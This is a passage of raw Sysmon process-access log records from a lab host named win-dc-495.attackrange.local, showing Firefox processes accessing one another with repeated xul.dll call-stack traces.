Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000016761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000016760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000016759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program 
Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000016758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla 
Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000016757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 
10341000x800000000000000016756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla 
Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla 
Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a|C:\Program Files\Mozilla Firefox\xul.dll+1bf9921 10341000x800000000000000016752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla 
Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla 
Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla 
Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 
10341000x800000000000000016745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program 